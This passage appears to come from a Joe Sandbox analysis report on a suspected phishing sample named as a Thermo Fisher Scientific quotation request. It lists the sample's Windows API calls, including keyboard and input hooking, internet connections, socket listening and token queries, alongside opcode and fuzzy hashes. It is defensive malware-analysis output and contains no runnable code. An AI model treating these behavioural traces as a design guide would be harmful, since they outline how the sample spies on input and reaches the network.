                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: c77dbcff9105b79096ab7ff5dcc8f98e0da2324b300aea85de3bccaa88f919fc
                                                              • Instruction ID: e0fdaa30caea6966ca8b7fe18f435fdc9c1d12213df4f32fb568d3fefaca8658
                                                              • Opcode Fuzzy Hash: c77dbcff9105b79096ab7ff5dcc8f98e0da2324b300aea85de3bccaa88f919fc
                                                              • Instruction Fuzzy Hash: 5D31E430A00268AEEF219B64C819BFE7BA7DB65310F04025AE481933D1C7748B85D765
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00634038
                                                              • __isleadbyte_l.LIBCMT ref: 00634066
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00634094
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006340CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 1f7b65bcc8b99a1e8c78d614b6cd8c641e94863cfac92d83ded0e32c77ee793e
                                                              • Instruction ID: 5785567a709e382c4559001e5d6474854cd37ee403656c40f91beb80d99f3636
                                                              • Opcode Fuzzy Hash: 1f7b65bcc8b99a1e8c78d614b6cd8c641e94863cfac92d83ded0e32c77ee793e
                                                              • Instruction Fuzzy Hash: B131D230704616AFDB259F34C844BAABBB7FF41310F154028E6618B2A1EB31E891DBD0
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00667CB9
                                                                • Part of subcall function 00645F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00645F6F
                                                                • Part of subcall function 00645F55: GetCurrentThreadId.KERNEL32 ref: 00645F76
                                                                • Part of subcall function 00645F55: AttachThreadInput.USER32(00000000,?,0064781F), ref: 00645F7D
                                                              • GetCaretPos.USER32(?), ref: 00667CCA
                                                              • ClientToScreen.USER32(00000000,?), ref: 00667D03
                                                              • GetForegroundWindow.USER32 ref: 00667D09
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: f0e30b13fe73cfc53d3b688a2010cb09225c9588d3d041ea0da54598951bcc54
                                                              • Instruction ID: 7e7aa0ee44f0cdf6b7a1a4af468cf8169cf57e6c51861f68768af3aded1a19ad
                                                              • Opcode Fuzzy Hash: f0e30b13fe73cfc53d3b688a2010cb09225c9588d3d041ea0da54598951bcc54
                                                              • Instruction Fuzzy Hash: 0A312F71900108AFDB40EFB9C8459EFBBFEEF58314B10946AE815E3211DA319E45CFA4
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • GetCursorPos.USER32(?), ref: 0066F211
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0067E4C0,?,?,?,?,?), ref: 0066F226
                                                              • GetCursorPos.USER32(?), ref: 0066F270
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0067E4C0,?,?,?), ref: 0066F2A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 2aa3e750d9cb0c4a5eac5d10810657f42f01d0b2949df6a66acbb5ccd48275b2
                                                              • Instruction ID: 062b8adab1a11c92ec6e0cf154578960a38416e7eff6f737d49999d891215894
                                                              • Opcode Fuzzy Hash: 2aa3e750d9cb0c4a5eac5d10810657f42f01d0b2949df6a66acbb5ccd48275b2
                                                              • Instruction Fuzzy Hash: EB218079500018AFCB158F95E868EFE7BBBEF0A710F044169F9055B2A2D7319A51DF60
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00654358
                                                                • Part of subcall function 006543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00654401
                                                                • Part of subcall function 006543E2: InternetCloseHandle.WININET(00000000), ref: 0065449E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 0c0f4229f935ea30396fe81744f95d9e662b4f353eb2ba59d2b8815b223d13bd
                                                              • Instruction ID: 67b4ad021216b23d9e48f1e6c10b405fd16620de0e4854d7d84c724d3ee0192d
                                                              • Opcode Fuzzy Hash: 0c0f4229f935ea30396fe81744f95d9e662b4f353eb2ba59d2b8815b223d13bd
                                                              • Instruction Fuzzy Hash: FA21D131200601BBEB119F61DC00FBBB7ABFF4471AF00411EBE15976A0DF71986997A4
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00658AE0
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00658AF2
                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00658AFF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658B16
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastacceptselect
                                                              • String ID:
                                                              • API String ID: 385091864-0
                                                              • Opcode ID: 4e4aa3cb0c85f08693196376ca357a712b6570528ba817ff11d9c087f6a07e58
                                                              • Instruction ID: 8990a9a8faf3d9741ed4a24a59c91c26f55647178e77d80f5eda434010929de3
                                                              • Opcode Fuzzy Hash: 4e4aa3cb0c85f08693196376ca357a712b6570528ba817ff11d9c087f6a07e58
                                                              • Instruction Fuzzy Hash: 4A219372A00124AFC7519F68C885ADEBBEDEF49310F00426AF849E7290DB749A458FA4
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00668AA6
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00668AC0
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00668ACE
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00668ADC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: 4f6a4e53362c95cfb17e96175a380d30cbf686f7cc0068efa53ff2478c437fa2
                                                              • Instruction ID: 927456a2b8f908fabe47322af2563e8566cb08322e4c7903c6cffa6e9f6cc738
                                                              • Opcode Fuzzy Hash: 4f6a4e53362c95cfb17e96175a380d30cbf686f7cc0068efa53ff2478c437fa2
                                                              • Instruction Fuzzy Hash: 4B119331345111AFD744AB64CC15FBA779BAF85320F144219F916C72E2DBB4AD418794
                                                              APIs
                                                                • Part of subcall function 00641E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00640ABB,?,?,?,0064187A,00000000,000000EF,00000119,?,?), ref: 00641E77
                                                                • Part of subcall function 00641E68: lstrcpyW.KERNEL32(00000000,?,?,00640ABB,?,?,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00641E9D
                                                                • Part of subcall function 00641E68: lstrcmpiW.KERNEL32(00000000,?,00640ABB,?,?,?,0064187A,00000000,000000EF,00000119,?,?), ref: 00641ECE
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00640AD4
                                                              • lstrcpyW.KERNEL32(00000000,?,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00640AFA
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0064187A,00000000,000000EF,00000119,?,?,00000000), ref: 00640B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: 100708f0fed54b239ea8e6c9e06856de16237c3e2a93208cff34ecff599bf16e
                                                              • Instruction ID: e001f946cfddbf7b158357ef7c54e1a6aef6acf749a3e89468eb3e43c5ae38c5
                                                              • Opcode Fuzzy Hash: 100708f0fed54b239ea8e6c9e06856de16237c3e2a93208cff34ecff599bf16e
                                                              • Instruction Fuzzy Hash: 7A11E63A200305BFDB25AF34DC45DBA77AAFF49354B80412AF906CB290EB729841C7E4
                                                              APIs
                                                              • _free.LIBCMT ref: 00632FB5
                                                                • Part of subcall function 0062395C: __FF_MSGBANNER.LIBCMT ref: 00623973
                                                                • Part of subcall function 0062395C: __NMSG_WRITE.LIBCMT ref: 0062397A
                                                                • Part of subcall function 0062395C: RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000001,00000000,?,?,0061F507,?,0000000E), ref: 0062399F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 8c1e5cc5fc207aa005aea190592acaaf438db6ae13e807be880ff7eac296f601
                                                              • Instruction ID: 087eb2e7eb3b4c49dc78004c629c5e28338578b2097e107d15ac08f235dd1c24
                                                              • Opcode Fuzzy Hash: 8c1e5cc5fc207aa005aea190592acaaf438db6ae13e807be880ff7eac296f601
                                                              • Instruction Fuzzy Hash: 6911E372548A32AFDB253F70BC14AAA3BA7AF15360F20452DF8499A391DB34C9408FD4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006405AC
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006405C7
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006405DD
                                                              • FreeLibrary.KERNEL32(?), ref: 00640632
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                              • String ID:
                                                              • API String ID: 3137044355-0
                                                              • Opcode ID: b56a25ed85893d9bbdb03bc5b9a17bac77ccc533498275d03ee02518f9d8f451
                                                              • Instruction ID: 8059f850d7329c7af256c7a11ae4099b6f5d1781d633b7f300cba579898a4b1e
                                                              • Opcode Fuzzy Hash: b56a25ed85893d9bbdb03bc5b9a17bac77ccc533498275d03ee02518f9d8f451
                                                              • Instruction Fuzzy Hash: 2021DD71900229FFEB20DF94DC98ADABBBAEF40300F00856DE61792150DBB4EA55DF60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00646733
                                                              • _memset.LIBCMT ref: 00646754
                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006467A6
                                                              • CloseHandle.KERNEL32(00000000), ref: 006467AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                              • String ID:
                                                              • API String ID: 1157408455-0
                                                              • Opcode ID: b75905c94392321bddeb16018ed53de7effbabf924cfcfe96c20c186d4829b92
                                                              • Instruction ID: afa60a780213d43387a61ae2952281732177bf4b3c8463909201ab75f73592c9
                                                              • Opcode Fuzzy Hash: b75905c94392321bddeb16018ed53de7effbabf924cfcfe96c20c186d4829b92
                                                              • Instruction Fuzzy Hash: B411E7759012287AE72067A5AC4DFEBBBBCEF45764F10429AF504E71D0D2704E808B75
                                                              APIs
                                                                • Part of subcall function 0063AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0063AA79
                                                                • Part of subcall function 0063AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0063AA83
                                                                • Part of subcall function 0063AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0063AA92
                                                                • Part of subcall function 0063AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0063AA99
                                                                • Part of subcall function 0063AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0063AAAF
                                                              • GetLengthSid.ADVAPI32(?,00000000,0063ADE4,?,?), ref: 0063B21B
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0063B227
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0063B22E
                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 0063B247
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                              • String ID:
                                                              • API String ID: 4217664535-0
                                                              • Opcode ID: 925dc1495836cbb823bb0fed5504280eb42185232653b03166396c33d2c8d9f7
                                                              • Instruction ID: 56bd1855dd9deb5a6a63f21af36e626b4d4199787ed6220eb52e33c5fe3be638
                                                              • Opcode Fuzzy Hash: 925dc1495836cbb823bb0fed5504280eb42185232653b03166396c33d2c8d9f7
                                                              • Instruction Fuzzy Hash: 8B116071A00205BFDB049F94DC85ABFB7AAEF85314F14A12EE68297250D7319F44DB60
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0063B498
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0063B4AA
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0063B4C0
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0063B4DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 7f61d4672ccb6dca9625ad4248d22c2c3abce577a805be4f3f3fe6927ad184d6
                                                              • Instruction ID: f9143b6ee7701763a8140396660b4ea0ebd673358838ded2ac62b8e893efc5fc
                                                              • Opcode Fuzzy Hash: 7f61d4672ccb6dca9625ad4248d22c2c3abce577a805be4f3f3fe6927ad184d6
                                                              • Instruction Fuzzy Hash: 63115A7A900218FFDB11DFA8C981EDDBBB5FB08700F204091E604B7295D771AE11DB94
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0061B5A5
                                                              • GetClientRect.USER32(?,?), ref: 0067E69A
                                                              • GetCursorPos.USER32(?), ref: 0067E6A4
                                                              • ScreenToClient.USER32(?,?), ref: 0067E6AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: bef53882b86041461cc73abafdad28c0da29800a560d8b292c825a8b8acf884a
                                                              • Instruction ID: d4f04c4c804813c23b50e99817642f86082c61ef821138d8f86be41f2735a0ba
                                                              • Opcode Fuzzy Hash: bef53882b86041461cc73abafdad28c0da29800a560d8b292c825a8b8acf884a
                                                              • Instruction Fuzzy Hash: B2113671900029BBCB10DF94D8459EE7BBBEB0A304F041459E901E7281D330AA96CBB5
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00647352
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00647385
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0064739B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006473A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: fcfec9cb38eac682b7ed3ffb681a047e948926df997e2bb94de80e26e206f634
                                                              • Instruction ID: 331cb51b9dff04c2ba3867745ed5b326e9a3fe78f7ef08fe14cbffd12891f3bf
                                                              • Opcode Fuzzy Hash: fcfec9cb38eac682b7ed3ffb681a047e948926df997e2bb94de80e26e206f634
                                                              • Instruction Fuzzy Hash: 2D11A572A04224BBCB029FACDC09EEE7BAB9B49350F144355F925D3391D7749E009BB1
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                              • GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateMessageObjectSendStockWindow
                                                              • String ID:
                                                              • API String ID: 3970641297-0
                                                              • Opcode ID: b47a9b3e7d2df9a45daa8a2d00d98674d72f64f18ccf1655de2894d9098fe7ae
                                                              • Instruction ID: 23c90f2cf9bf32bbf4cbba9e6a425dff328fc4c0cc10021fb582b4b721c4ce3e
                                                              • Opcode Fuzzy Hash: b47a9b3e7d2df9a45daa8a2d00d98674d72f64f18ccf1655de2894d9098fe7ae
                                                              • Instruction Fuzzy Hash: 6C11C072101509BFEF024F90DC56EEABB6BFF093A4F085206FA0452150C732DCA0DBA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
